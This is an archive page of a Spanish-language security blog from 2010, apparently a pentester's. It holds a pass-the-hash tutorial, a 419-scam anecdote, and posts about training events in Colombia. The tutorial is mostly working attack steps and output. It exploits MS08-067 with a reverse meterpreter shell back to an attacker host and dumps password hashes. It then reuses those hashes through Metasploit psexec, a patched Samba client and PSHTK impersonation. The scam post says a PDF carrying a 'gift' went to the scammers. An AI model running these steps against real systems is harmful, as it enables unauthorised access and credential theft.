viernes, 30 de abril de 2010

¿Quién Quiere Ser Millonario?

Hace unos días me contactaron de la Fundación Cargill para felicitarme, ya que fui seleccionado como beneficiario de una donación de 4.000.000 USD!

"La Fundación Cargill desea informarle de que su correo electrónico surgido como uno de los afortunados ganadores que recibirán una subvención de 4.000.000 dólares EE.UU. Todos los participantes en la versión en línea fueron seleccionados al azar de los sitios web del Mundo y bases de datos en Internet y los ganadores fueron extraídas de más de 100.000 uniones, asociaciones y empresas que se enumeran en línea."

Por suerte, la fundación cuenta con muchas facilidades a la hora de transferir y disponer del dinero:

"La subvención se le enviará a usted a través de una tarjeta Visa Internacional que ha sido cargado con la suma de subvención y tan pronto usted lo consigue, van a proceder a cualquier cajero automático en su país para hacer retiros de su fondo de subvención."

Después de varios emails, y para comprobar la legalidad de toda la operación, me enviaron el siguiente certificado:


Para que la transferencia pueda ser realizada, me solicitaron que envíe 450USD por Western Union o Money Gram, dado que esta operación genera gastos y parece ser que necesito un seguro.

"El costo de la entrega y el seguro es EE.UU. $ 450 y deben ser pagados en su totalidad sin ninguna demora. Por lo tanto, la amabilidad de seguir adelante y hacer el pago de 450 dólares EE.UU. de los gastos de prestación de servicios si tenemos que seguir adelante y tener esta transacción celebrada en beneficio mutuo a fin de que la entrega de tarjetas no se cancelará. En vista de estos hechos, entonces se le pide que copie los datos para realizar el pago a través de Western Union o Money Gram transferencia de dinero la agencia."

Dude un poco en enviar el dinero, pero que son 450USD cuando luego me van a transferir 4.000.000USD, ¿no?

Esta es una variante de la estafa nigeriana, timo nigeriano o timo 419, un fraude. Según la Wikipedia...

"Esta estafa consiste en ilusionar a la víctima con una gran fortuna, que en realidad es inexistente, con objeto de persuadirla luego para que pague una suma de dinero por adelantado como condición para acceder a la supuesta fortuna."

http://es.wikipedia.org/wiki/Estafa_nigeriana
 
Como me pedían que les envíe el comprobante de la transferencia, se los mande dentro de un archivo ".PDF", con un regalito adentro... ;-)

miércoles, 28 de abril de 2010

Pass-the-Hash con MetaSploit, SAMBA Patch y PSHTK

En este artículo, vamos a utilizar el módulo PSEXEC de MetaSploit, el patch para SAMBA de JoMo-kun (Foofus) y el Pass-the-Hash Toolkit "PSHTK" de Hernán Ochoa.

Durante un Pentest, conseguir un password es algo muy valioso, pero por qué realizar ataques de fuerza bruta, o dedicar meses crackeando una contraseña, cuando simplemente podemos utilizar el hash sin crackear de la víctima.

La técnica de Pass-the-Hash ha estado entre nosotros por más de 13 años, siendo publicada originalmente en 1997 por Paul Ashton. Desde entonces aparecieron varias herramientas, con algunas limitaciones superadas en los últimos tiempos, que lograron que estas, también sean más fáciles de utilizar.

La idea de este post, es realizar una pequeña introducción a Pass-the-Hash, para seguir profundizando luego en futuros artículos. A continuación, vamos a ver como obtener los hashes de la víctima con el comando hashdump de meterpreter, y cómo utilizar estos hashes, con el módulo PSEXEC de MetaSploit, el patch para SAMBA de JoMo-kun (Foofus) y el Pass-the-Hash Toolkit "PSHTK" de Hernán Ochoa.

Para quienes quieran conocer más profundamente como funciona esta técnica, les recomiendo leer el paper de Bashar Ewaida publicado en SANS, y ver la presentación de Jose Selvi (pentester.es) que realizó en la FIST de Barcelona.


Obteniendo los Hashes

Hay muchas formas de obtener los hashes de la víctima, pero a continuación lo vamos a hacer explotando una vulnerabilidad con MetaSploit, y luego utilizando el comando "hashdump" de meterpreter:

use windows/smb/ms08_067_netapi
set RHOST 192.168.1.37
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.15
exploit
meterpreter > hashdump
Administrador:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
Invitado:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
IUSR_EVILNINJA:1001:4cd3d6f079c529c6139f413c08fb0bc0:1814558a03e2e6be1e896abd343275b2:::
IWAM_EVILNINJA:1002:d2d8bbad7184a0fa5c262f913af7c48d:88f10abdecbc1c6d84b9d2d193e01334:::
student:1006:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
TsInternetUser:1000:889651ab45c9556e39af38e766c662c9:fb46d1badeacd92c1f11cd4a68945f6b:::
meterpreter >

Una vez obtenidos los hashes, el paso lógico seria crackearlos con herramientas como John the Ripper, Cain & Abel o Ophcrack, pero en este caso la idea es utilizarlos directamente, para loguearnos al sistema víctima, sin crackear el hash.


Pass-the-Hash con PSEXEC de MetaSploit

El módulo PSEXEC de Metasploit, es similar a la herramienta psexec de Sysinternals, que permite ejecutar comandos remotos en Windows. Solo que en este caso, también nos permite realizar Pass-the-Hash. 

Después de cargar el módulo, simplemente configuramos la variable "SMBPass" con el hash de Administrador que obtuvimos previamente.

use windows/smb/psexec
set RHOST 192.168.1.37
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.15
set SMBUser Administrador
set SMBPass e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c
exploit

El payload que tenemos configurado nos entregará un meterpreter reverso, pero podríamos utilizar cualquier otro payload.


Pass-the-Hash con el patch para SAMBA de JoMo-kun

La idea de los patches de JoMo-kun, es darle a SAMBA la habilidad de utilizar Pass-the-Hash. Existe un patch para la versión 3.3.7 de SAMBA, pero por alguna razón que no tengo ganas de comprender, una vez que esta todo compilado me tira segfaults. Así que lo haremos con la versión 3.0.22 de SAMBA que funciona muy bien:

# Bajamos los dos patch de JoMo-kun y SAMBA 3.0.22
wget http://www.foofus.net/jmk/tools/samba-3.0.22-passhash.patch
wget http://www.foofus.net/jmk/tools/samba-3.0.22-add-user.patch
wget http://us3.samba.org/samba/ftp/old-versions/samba-3.0.22.tar.gz

# Descomprimimos SAMBA y aplicamos los patchs
tar xvfz samba-3.0.22.tar.gz
patch -p0 
patch -p0 

# Configuramos y compilamos
cd samba-3.0.22/source/
./configure --with-smbmount
make

Si no tienen problema en "ensuciar" su distro con este SAMBA viejo patcheado, es recomendable hacer un "make install", de lo contrario van a tener que hacer un par de symlinks para algunos archivos que son llamados al path de instalación.

Una vez que esta todo instalado, exportamos la variable "SMBHASH" con el hash de Administrador que obtuvimos previamente:

export SMBHASH="e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c"

Luego, entramos al directorio "bin", y ejecutamos el comando "smbmount" para montar el share de la víctima utilizando como password un hash. Cuando "smbmount" pregunta por un "Password:", debemos escribir algo, cualquier cosa, ya que si lo dejamos vacío intentará loguearse como guest.

./smbmount //10.168.0.127/c$ /mnt/victima -o username=administrador
Password:
HASH PASS: Substituting user supplied NTLM HASH...
HASH PASS: Substituting user supplied NTLM HASH...
HASH PASS: Substituting user supplied LM HASH...

Ahora, cuando entremos al directorio "/mnt/victima", vamos a encontrar todo el share de la víctima montado en nuestro filesystem.


Pass the Hash con PSHTK de Hernán Ochoa

Sin dudas PSHTK es la más poderosa de todas las herramientas, principalmente porque funciona bajo Windows, y nos va a permitir usar todas las aplicaciones de este sistema nativamente.

PSHTK tiene dos archivos importantes, WHOSTHERE.EXE, que va a listar las sesiones que se loguearon en el sistema, y IAM.EXE, que nos va a permitir impersonar al usuario víctima.

Ambos programas, obtienen la información sobre los hashes de los usuarios que se loguearon, de la librería LSASRV.DLL en memoria. Como la dirección de memoria cambia según el sistema, puede pasar que esta  dirección no sea hallada automáticamente, y se la debamos pasar nosotros a través de la opción "-a".

Hernán mantiene en este website, un listado de sistemas con sus respectivas direcciones de memoria. Pero si no esta allí la dirección para el sistema que están usando, como me paso en este caso, deberemos obtener la dirección por nuestra cuenta. Para ello, les recomiendo seguir los pasos del excelente artículo que escribió Jose Selvi en su blog.

Para un Windows XP SP2 en español 
whosthere -a 753F642C:753F3F1B:7547FC38:7547FC40:7547EC40:7547EE34

Primero listamos los usuarios logueados en el sistema, y vemos que estamos con el usuario "admin":

whosthere.exe -a 753F642C:753F3F1B:7547FC38:7547FC40:7547EC40:7547EE34
(recortado, para mejor visualización)
admin:KUNGF52EB87CC7:E52CAC67419A9A224A3B108F3FA6CB6D:8846F7EAEE8FB117AD06BDD830B7586C
KUNG-F52EB87CC7$:INICIOMS:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0

Luego, impersonamos al usuario víctima, en este caso "kungfoosion":

iam.exe -a 753F642C:753F3F1B:7547FC38:7547FC40:7547EC40:7547EE34 -h 
kungfoosion:INICIOMS:E52CAC67419A9A224A3B108F3FA6CB6D:8846F7EAEE8FB117AD06BDD830B7586C
IAM v1.4 - by Hernan Ochoa (hochoa@coresecurity.com, hernan@gmail.com) - 
(c) 2007-2008 Core Security Technologies
Parameters:
Username: kungfoosion
Domainname: INICIOMS
LM hash: E52CAC67419A9A224A3B108F3FA6CB6D
NT hash: 8846F7EAEE8FB117AD06BDD830B7586C
Run:
LSASRV.DLL version: 00050001h. A280884h
Checking LSASRV.DLL....Ok! using supplied addresses.
The current logon credentials were sucessfully changed!

Finalmente, podemos observar que impersonamos exitosamente a ese usuario:

whosthere.exe -a 753F642C:753F3F1B:7547FC38:7547FC40:7547EC40:7547EE34
(recortado, para mejor visualización)
kungfoosion:INICIOMS:E52CAC67419A9A224A3B108F3FA6CB6D:8846F7EAEE8FB117AD06BDD830B7586C
KUNG-F52EB87CC7$:INICIOMS:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0

Esto es todo amigos, no dejen de probarlo que esta muy bueno!! :)


REFERENCIAS:
- Paul Ashton (1997): NT "Pass the Hash" with Modified SMB Client Vulnerability
- Core Security: Pass-The-Hash Toolkit
- HEXALE: Blog de Hernán Ochoa
- pentester.es: Pass-the-hash Toolkit & IDA Pro
- pentester.es: Windows Post-Explotation & Pass-the-Hash
- pentester.es: Técnicas Pass-the-Hash
- foofus.net: JoMo-kun patch para SAMBA


Publicado por Leonardo Pigñer en www.KUNGFOOSION.com

sábado, 24 de abril de 2010

Hacia la Campus Party Colombia!

Me aceptaron la charla para la Campus Party Colombia, por lo que me siento muy honrado de poder asistir a este evento por primera vez! :)


La Campus Party se creo en España en 1997, como un punto de encuentro entre las diferentes comunidades informáticas. Luego en el 2008, el evento se volvió internacional y actualmente también tiene ediciones anuales en Colombia, Brasil y México.

La 3a Edición de la Campus Party Colombia, va a tener lugar en Bogotá, del Lunes 28 de Junio al Domingo 4 de Julio. Para esta edición, se esperan unos 4000 geeks que van a convivir (literalmente) juntos por 7 días.

El invitado especial para la Campus Party de este año, no es ni más ni menos que Steve Wozniak, uno de los fundadores de Apple Inc., y un verdadero ícono del movimiento de Sillicon Valley.


Otro dato importante que me comentaron, es que este año la Campus Party va a contar con un pabellón exclusivo para los security geeks, en donde se realizarán charlas, workshops y otras actividades.

Por mi parte, voy a dar una charla llamada "What Works on Client Side Pentesting", sobre las técnicas más efectivas que se utilizan en tests de penetración del tipo client side, y también voy a dictar un workshop de 4hs sobre la misma temática, al que no se me ocurrió un nombre más original que "Client Side Pentesting Workshop".

Felicidad absoluta por volver a encontrarme con mis amigos colombianos, y poder participar por primera vez de la Campus Party! :)

Ahora me pregunto, ¿Por qué no hay una Campus Party Argentina?

LINKS:
- Campus Party Colombia: Seguridad y Redes

jueves, 22 de abril de 2010

Entrevista a DragoN de La Comunidad DragonJAR

Tuve el placer de conocer a DragoN, cuando en conjunto con La Comunidad DragonJAR, una de las comunidades de seguridad informática más grandes de Latinoamérica, llevamos por primera vez el COMBAT training a Colombia.


DragoN es un tipo que detrás de su apariencia tranquila y relajada, se encuentra todo el tiempo trabajando en diferentes proyectos, y coordinando tareas con una gran cantidad de personas.

Durante las dos semanas que compartimos juntos por Bogotá y Medellín, me encontré con una persona sencilla, con una gran capacidad emprendedora, que trabaja incansablemente para que todos los miembros de su comunidad puedan  crecer en el campo de la seguridad.

En la primer entrevista que realizo para este blog, tengo el gusto de entrevistar a un amigo, el Sr. Jaime Andrés Restrepo.


1) ¿Cuáles fueron tus orígenes en el mundillo de la seguridad?

Como mucha gente, me inicié en el mundo de la informática gracias a los vídeo juegos, me apasionaban mucho estos aparatos hasta que conocí los computadores, con los que me fui metiendo poco a poco en este mundo y al descubrir internet todo cambió. Mi adicción a internet hizo que explorara formas de conseguir conexión gratuita a esta red, en el proceso de búsqueda (por AltaVista) me topé con varias páginas que trataban temas de seguridad (“hackers”) y desde ese entonces, no he podido salirme de ese mundo.


2) ¿Cómo nació La Comunidad DragonJAR?

Todo comenzó en el último año de colegio (2001), teníamos en la materia de informática clases de HTML y al terminar el curso decidieron hacer un concurso de la mejor página web en HTML y la página ganadora resulto ser la mía, ahí nació mi página personal “La WeB de DragoN”, el profesor me dijo que sería bueno subirla a internet en un servidor gratuito llamado “freeservers” y como el dominio dragon.8m.com estaba tomado, decidí ponerle mi Nick (dragon) más mis iniciales (jar) asi nació dragonjar.8m.com

En la página iba publicando las cosas que aprendía poco a poco en internet y al ver que cuando publicaban algo nuevo recibía varios comentarios (algunos incluso mejores que el propio artículo publicado) decidí crear un foro que rápidamente fue creciendo, al ver el movimiento de este, decidí darle prioridad a los usuarios para que pudieran debatir, discutir y publicar sus propios contenidos, en ese momento la página dejo de ser “La WeB de DragoN” a ser “La Comunidad DragonJAR”, ya que entre todos aportamos conocimientos y no era justo que yo me quedara con todo el crédito.


3) ¿En qué otros proyectos estas involucrado?

Ahora estoy tratando de sacar un programa de televisión que trate temas de seguridad informática, realizar varias certificaciones internacionales en seguridad informática, terminar mi pre-grado, realizar un total rediseño de nuestros portales y logos, entre otras cosas que solo te puedo contar cuando las realice ya que aún no están confirmadas.


4) Entre La Comunidad, la universidad y la novia, ¿de dónde sacas el tiempo para hacer tantas cosas?

Como todos los “informáticos”, le robo horas al día trabajando hasta tarde en la noche, me parece un horario excelente para trabajar ya que solo se respira tranquilidad y es posible concentrarse bastante; También trato de seguir los consejos de Alberto Pena (thinkwasabi.com) sobre organización del tiempo, pero muchas veces se hace difícil.


5) ¿Cómo es un típico desayuno "paisa", y por el amor de dios, porque comen tanto?!!

Un típico desayuno paisa debe tener:

- Calentado de frijoles (frijoles del día anterior)
- Arroz
- Huevo
- Arepa con Mantequilla y Queso
- Chocolate

Y lo que quiera adicionarle ya depende del hambre que tenga.

Se come en esas cantidades por cultura, la zona paisa se caracterizaba por tener muchos arrieros (personas encargadas de guiar los animales de carga y abrir caminos), estas personas acostumbraban comer mucho, ya que solo podían parar a comer en cada pueblo y estos estaban muy lejos unos del otro, poco a poco fueron desapareciendo los arrieros pero en la cultura paisa se quedó plasmada esta práctica de comer abundante y RICO.


6) ¿Cuál es la ciudad colombiana con la que te sentís más identificado?

Manizales, llevo ya 6 años en esa ciudad y me gusta mucho, pequeña, tranquila, tradicional, buen clima, buenas mujeres y buen ambiente universitario ya que el promedio de edad per cápita de esta ciudad es de 26 años.

Aunque me gustaría mucho vivir en Medellín ya que es una ciudad mucho más grande que Manizales y con mucho movimiento en cuanto a tecnología, tiene todo lo que me gusta en una sola ciudad, cultura, tecnología y diversión.


7) ¿Qué tiene que saber un argentino para no cometer un #fail en Colombia?

Que cuando invitas a un “amigo” en Colombia al “boliche” y este “coge” una “cachucha” para salir…

El colombiano piensa que lo estás invitando a jugar bolos y se pone una gorra para salir…

El argentino posiblemente piense otra cosa muy distinta… 


8) Cuando no estas pendiente del uptime de DragonJAR, ¿cuáles son tus pasatiempos?

Me gusta mucho viajar, y aprender cosas nuevas, asistir a eventos de tecnología es una excusa para hacer las dos cosas que más me gusta hacer, aprender cosas nuevas y viajar.


9) ¿Por qué mudaste los servidores de DragonJAR de USA a Holanda?

Porque la legislación de Holanda sobre temas tecnológicos es un poco más “flexibles” y en USA presenté algunos problemas legales con un proyecto de la comunidad llamado WUDE.


10) ¿Es verdad que en Colombia los hackers se llevan todas las niñas?

Muchos administradores de sistemas en Colombia, acostumbran nombrar sus servidores con diosas de la mitología griega, por lo tanto la mayoría de las niñas que se llevan los hackers en Colombia son Atenea, Afrodita, Artemisa, etc…

Por lo general quienes nos dedicamos a esto somos poco sociables (aunque hay excepciones), factor en contra si te quieres acercar al sexo opuesto.

En Colombia quienes se llevan las niñas son los mismos que en otros países del mundo, los apuestos, los ricos, los extranjeros, los bailarines y sociables, si tienes alguna de estas cualidades no tendrás problemas en conseguir una bonita colombiana para ti.


11) De todos los hackers que conociste en conferencias y eventos, ¿Quién es el que más admiras y por qué?

Admiro mucho a RSnake, por sus aportes al campo de la seguridad web, pero de los que he conocido personalmente, podría decir que Mitnick, ya que logra hacer instrucciones que serían muy difíciles de hacer técnicamente, pero con el dominio que tiene de la ingeniería social, consigue su objetivo, además de ser una persona muy sencilla y abierta.


12) Recomendame 3 libros de seguridad y 3 películas que te hayan gustado.

Si las películas son relacionadas a la seguridad…

- Antitrust
- Los piratas de silicon valley
- Juegos de Guerra        

Si son libros técnicos…

- Hackers (S. McClure)
- Análisis Forense Digital en Entornos Windows (Juan Garrido)
- Libro de NMap (Fyodoor)


13) ¿Por qué tomaste la sabia decisión de comprarte una Mac?

Desde que me compre un iPod Touch y vi el sistema operativo que traía, me entró la curiosidad por probar el Mac OS, lo instale en mi portátil HP y la verdad es que el sistema me cautivó, se tienen toda la simplicidad de un entorno Windows, con la base de un kernel unix y la belleza propia de mac os x, desde eso estoy ahorrando para comprar una Mac.


14) ¿Qué herramientas nunca faltan en tu laptop?

VMWare y Backtrack


15) ¿Cómo ves a la comunidad de seguridad colombiana?

Cada vez más grande y unida, antes todos hacían cosas por aparte y nadie se daba cuenta de lo que hacían los demás, ahora afortunadamente tenemos formas de darnos a conocer más fácil, encontrar personas con los mismos intereses por la seguridad y crear proyectos en conjunto.


16) ¿Cómo te imaginas a La Comunidad DragonJAR dentro de 5 años?

Muchísimo más grande, con diferentes proyectos propios reconocidos a nivel internacional, pero conservando el calor humano y las amistades que se han forjado en todos estos años y que han ayudado al crecimiento y reconocimiento de la comunidad dragonjar.


17) ¿Porqué para este mundial, Colombia hincha por la selección de Brasil y no la de Argentina?

Colombia se destacó en los 90’s con el juego del “toque-toque” y de jugadas bonitas, tomado de los brasileños, es por eso que el colombiano promedio se siente identificado con el juego que expresa la selección brasileña y no la argentina.


18) ¿Qué consejo le darías a alguien que quiere dar sus primeros pasos en este mundillo?

Que lean mucho y practiquen mucho más, esa es la base para aprender cualquier disciplina incluida la seguridad informática.

Si tienen oportunidad de asistir a eventos o capacitaciones sobre el tema, háganlo, muchas veces acortaran la brecha de aprendizaje y conocerás gente a la que le interesan los mismos temas.


19) ¿Vamos a contar con un contingente de dragonitas para la ekoparty 2010?

Por supuesto, vamos a asistir a la EKOparty para tratar de absorber todo el conocimiento que podamos, hacer amigos y pasarla bien.


Publicado por Leonardo Pigñer en KungFooSion.blogspot.com

martes, 20 de abril de 2010

Nueva dirección: www.KUNGFOOSION.com

La nueva dirección de este blog es: www.KUNGFOOSION.com. La antigua dirección, redirecciona a la nueva, por lo que no necesitan actualizar sus bookmarks, ni tampoco sus feeds.


Como una nueva estrategia para derribar los mitos de la blogósfera, voy a probar si es verdad que un dominio propio, atrae más trafico que un subdominio de "blogspot.com". Después les cuento :)

domingo, 18 de abril de 2010

Crónicas del COMBAT training 2.0 en Medellín

El segundo COMBAT training en Colombia, organizado por BASE4 Security junto a La Comunidad DragonJAR, paso exitosamente por la hermosa ciudad de Medellín!


Con un grupo de casi 20 personas, la mayoría paisas y costeños, paso por Medellín la segunda maratónica semana de COMBAT training en Colombia. Nuevamente un grupo increíble de personas, con un gran nivel técnico, que lograron que esta semana sea de lo mas entretenida.

Después de pelear punto a punto durante toda la semana, llego el CTF del viernes, y los ganadores fueron: (1) 4v4t4r, (2) John Cesar Arango y (3) Julian Andrés Giraldo.


Don Fernando, de El HackLab, se dedicó a correr el rumor de que 4v4t4r ganó el CTF porque en realidad era Kung-Fu Panda disfrazado. Desde este blog queremos desmentir ese comentario malicioso, y aclarar que cualquier similitud es pura coincidencia... :P


Aprendida la lección del After-Office de Bogotá, sobre que la cantidad de cervezas que se calcula para un colombiano, es cuatro veces superior a la que se calcula para un argentino, Jerónimo descubrió un bar donde teníamos barra libre de cerveza toda la noche.


Lo que desconocíamos, es que a los costeños se les seca la garganta muy rápido, y esa noche el mozo del bar tuvo mucho trabajo llendo y viniendo con jarras de cerveza.

Para finalizar, fueron dos semanas increíbles, en la que nos hicimos muchos amigos que estoy seguro que vamos a volver a ver muy pronto! Un fuerte abrazo para La Comunidad DragonJAR y especialmente para el amigo Dragon.

Esta de más decir que Colombia es un país muy hermoso, que me sorprendió con su diversidad cultural, la calidez de su pueblo y la belleza de sus paisajes. Sin dudas tengo planeado volver a Colombia, pero esta vez va a ser solo para visitar amigos y como turista! :)

miércoles, 14 de abril de 2010

El HackLab @ Medellín

Durante toda esta semana, vamos a estar realizando el COMBAT training en "El HackLab" de Medellín.

David Moreno, Leo Pigner, Fernando Quintero y Pedro Leon

El HackLab es un espacio físico y virtual dentro del cual se promueve la investigación en los campos relacionados con la cultura de la seguridad de la información y el de las nuevas tecnologías con una proyección social, educativa y cultural.

El objetivo de realizar el COMBAT training en este lugar, es precisamente que los asistentes puedan integrarse a un espacio donde se promueve la colaboración y el aprendizaje grupal.


La experiencia hasta ahora, ha sido muy enriquecedora para todos los que nos encontramos conviviendo en este lugar, con muchos de los asistentes del COMBAT training quedandose hasta tarde en la noche para realizar laboratorios y probar cosas nuevas.

Los responsables de El Hacklab son David Moreno, Fernando Quintero, Pedro Leon y Camilo Zapata, cuatro grosos de la seguridad que trabajan incansablemente en este proyecto, con la infaltable ayuda de los "practicantes" Jonathan Waldo y Anderson Linares.

Don David, conocido en el bajo mundo como 4v4t4r, también lidera el proyecto SecTrack, que provee a la comunidad de un excelente repositorio de recursos relacionados a la implementación de trainings y laboratorios de seguridad.

Les recomiendo leer una entrevista que les realizaron a los integrantes de El Hacklab para el diario El Colombiano titulado "Hackers ponen a prueba sus técnicas", pero no se confundan! estos no son hackers que beben Red Bull... :P

Para finalizar, es un verdadero placer tener la oportunidad de conocer a excelentes personas, e increíbles profesionales, como la gente de El Hacklab, y no dejen de visitarlos si tienen la suerte de visitar Medellín.

LINKS RELACIONADOS:
- El HackLab
- SecTrack
- Entrevista en El Colombiano

domingo, 11 de abril de 2010

Karmetasploit: User FAIL

Foto tomada al aula contigua a donde se dictaba el COMBAT training en Bogotá. User FAIL!!


Loading...

Publicado por Leonardo Pigñer en KungFooSion.blogspot.com

sábado, 10 de abril de 2010

Crónicas del COMBAT training 2.0 en Bogotá

El primer COMBAT training en Colombia, organizado por BASE4 Security junto a La Comunidad DragonJAR, paso exitosamente por la ciudad de Bogotá, y la próxima semana estará en Medellín!

Arriba Jeronimo, Wilson, Efren, Leo, Dragon, Rafael, Carlos y Lucas, luego Freddy y Samurai Blanco, y abajo Mauricio, sp1b0t, Rodrigo, Edward y Jensy

Fue una semana muy intensa, donde desde el primer momento se sentía la tensión de quienes estaban decididos a ser los ganadores del primer COMBAT training en Colombia. Para hacerlo aun mas competitivo, el nivel técnico de casi todos los asistentes era muy alto.

Después de una batallada semana, llego el CTF del viernes, y los ganadores fueron: (1) Dragon, (2) Edward, (3) sp1b0t y (4) Mauricio. La katana quedo para Edward, ya que Dragon competía solo por el honor, puesto que era uno de los organizadores del evento.

Dragon, Edward, Leo, Mauricio, sp1b0t y Jeronimo

Afortunadamente, siempre tuve excelentes grupos humanos en todos los trainings que dicte, pero el grupo de Bogotá fue impresionante, realmente me sorprendieron! Los quiero muchachos! :)

El Jueves por la noche, en lo que iba a ser la previa al CTF del viernes, realizamos una pequeña recepción para todos los asistentes del training, en lo que bautizamos "La Mansión DragonJAR", un gigantesco apartamento en donde nos hospedábamos los organizadores del training.


Por supuesto, al juntar a muchos geeks con mucha cerveza, fueron inevitables las clásicas discusiones sobre lenguajes de programación, sistemas operativos y software libre. Que es casi lo mismo que hablar de política, fútbol o religión. Les mando un saludo a "Los Talibanes del Software Libre" que me hicieron pasar momentos muy divertidos :P

Algo que aprendimos con Jeronimo, es que la cantidad de cervezas x persona en Colombia, es el doble de lo que uno calcularía para un borracho argentino. Es increíble lo que toman estos nenes, y no hablemos de lo que comen porque eso es una discusión aparte!

Fue un verdadero placer conocer a todos estos amigos colombianos, y especialmente a Dragon y Samurai Blanco, dos personas geniales que ya nos prometieron estar presentes en la ekoparty! ;)

Publicado por Leonardo Pigñer en KungFooSion.blogspot.com

domingo, 4 de abril de 2010

kungfoosion @ Bogotá

El Sábado llegamos a la hermosa ciudad de Bogotá para el primer COMBAT training en Colombia, mientras que la próxima semana estaremos por Medellín!

Ha sido un verdadero placer conocer a Dragon y Samurai Blanco, dos excelentes personas, que nos han recibido de primera! En los próximos mas novedades desde este hermoso país.

LinkWithin